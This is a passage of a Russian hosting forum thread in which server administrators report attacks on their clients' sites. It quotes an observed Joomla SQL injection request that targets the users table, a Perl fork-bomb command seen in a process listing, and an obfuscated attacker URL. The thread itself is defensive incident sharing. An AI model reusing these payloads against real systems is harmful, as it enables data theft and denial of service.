Будьте внимательны, безработные взломщики балуются ;)

K
На сайте с 07.03.2011
Offline
172
#31

Прошелся по первым страницам на том сайте, два российских нашел, один работает, второй нет, залита заглушка хакерская :) http://freerise.ru/

Услуги: Сервер i7 за 66 евро! (http://blackhost.ru/dedicated-servers), VPS SSD от 6 евро (http://blackhost.ru/vps) Гарантированные канал 1 Gbps за 337 евро (https://blackhost.ru/dedicated-servers#addons). Защита от DDoS-атак. Blackhost.ru - Наша тема (/ru/forum/892885)
P
На сайте с 10.11.2010
Offline
27
#32

Глянул логи mod_security на хостинге. За 3 последних часа насчитал более 30 попыток взлома. Целенаправленно выбирают сайты на джумле и атакуют запросами вида

/index.php?option=com_gurujibook&task=showPDF&bookid=-32%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C2%2C3%2C4%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--

К счастью, все сайты целые =)

IP атаковавших почти все разные, но все принадлежат какому-то hostnoc.net — United States Network Operations Center Inc.

Интересно, есть ли смысл писать им абузу? Сайт левый какой-то...

Login.by (http://login.by/) — хостинг в Беларуси
U1
На сайте с 26.10.2009
Offline
117
#33

Хост нок это бёрст.нет

sumar
На сайте с 22.11.2005
Offline
140
#34
Petabyte:
Глянул логи mod_security на хостинге. За 3 последних часа насчитал более 30 попыток взлома. Целенаправленно выбирают сайты на джумле и атакуют запросами вида

К счастью, все сайты целые =)
IP атаковавших почти все разные, но все принадлежат какому-то hostnoc.net — United States Network Operations Center Inc.

Интересно, есть ли смысл писать им абузу? Сайт левый какой-то...

Смысл есть! главное толково написать, хоть по ушам дадут кто арендует сервер\впс.

выделенные серверы - https://masterdedicated.com/ (https://masterdedicated.com/) доменные имена за приятную цену - только тут (https://masterdedicated.com/foru/announcements.php?id=2)
_Dizerd_
На сайте с 21.12.2011
Offline
76
#35
/index.php?option=com_gurujibook&task=showPDF&bookid=-32%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C2%2C3%2C4%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--

=

/index.php?option=com_gurujibook&task=showPDF&bookid=-32/**/uNiOn/**/all/**/sELeCt/**/0x33633273366962,2,3,4/**/fRoM/**%2Fjos_users--

Походу sql иньекция

B
На сайте с 20.11.2009
Offline
39
#36
LineHost
На сайте с 20.01.2007
Offline
339
#37

Новый взлом впс клиента, оставляет реквизит "Hасkеd Bу АLАJMAN Hacker" (кое какие буквы кирилицой я написал, чтоб не распространять)

Оставляет это [server11.mp 3q ur an.net/shatri/00 9.mp3] (пробелы только уберите) произведение, похоже на какой то обряд....

P.S. Работает полуручным режимом после овладения сервера, запускает подготовленный перл скрипт, логи стёрты.

SERV.LT - Стабильные услуги хостинга, KVM VPS в Литве, Франции. (https://www.serv.lt/ru/vps/kvm/) Недорогие выделенные серверы (https://www.serv.lt/ru/dedicated-lt/) в Литве.
[umka]
На сайте с 25.05.2008
Offline
456
#38
LineHost:
похоже на какой то обряд....

Бгг :) Обычная сура

http://ru.wikipedia.org/wiki/Сура_Ат-Тауба

Лог в помощь!
[Удален]
#39

Сегодня у клиента обнаружил "мильон" процессов perl на одном из vds. от имени пользователя, у которого права обычного шаред хостинга. Очень странно, разбираемся...

15860 jaks2 25 0 26128 1768 104 R 6.0 0.1 0:01.74 perl -MPOSIX -e $pid=fork; exit if $pid; setid; fork while(1)
15731 jaks2 25 0 26128 1768 104 R 6.0 0.1 0:01.79 perl -MPOSIX -e $pid=fork; exit if $pid; setid; fork while(1)
15764 jaks2 25 0 26128 1768 104 R 6.0 0.1 0:01.79 perl -MPOSIX -e $pid=fork; exit if $pid; setid; fork while(1)
15848 jaks2 25 0 26128 1768 104 R 6.0 0.1 0:01.69 perl -MPOSIX -e $pid=fork; exit if $pid; setid; fork while(1)
15833 jaks2 25 0 26128 1768 104 R 6.0 0.1 0:01.69 perl -MPOSIX -e $pid=fork; exit if $pid; setid; fork while(1)
15745 jaks2 25 0 26128 1768 104 R 6.0 0.1 0:01.79 perl -MPOSIX -e $pid=fork; exit if $pid; setid; fork while(1)
15749 jaks2 25 0 26128 1768 104 R 6.0 0.1 0:01.79 perl -MPOSIX -e $pid=fork; exit if $pid; setid; fork while(1)
LineHost
На сайте с 20.01.2007
Offline
339
#40

В общих чертах, делов наделал араб тучу, около шести часов выгребал. Непонятен до конца механизм как они получают root права, но есть как есть. Статистика такая, что все взломанные серера были с php.ini >> disable_functions =

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий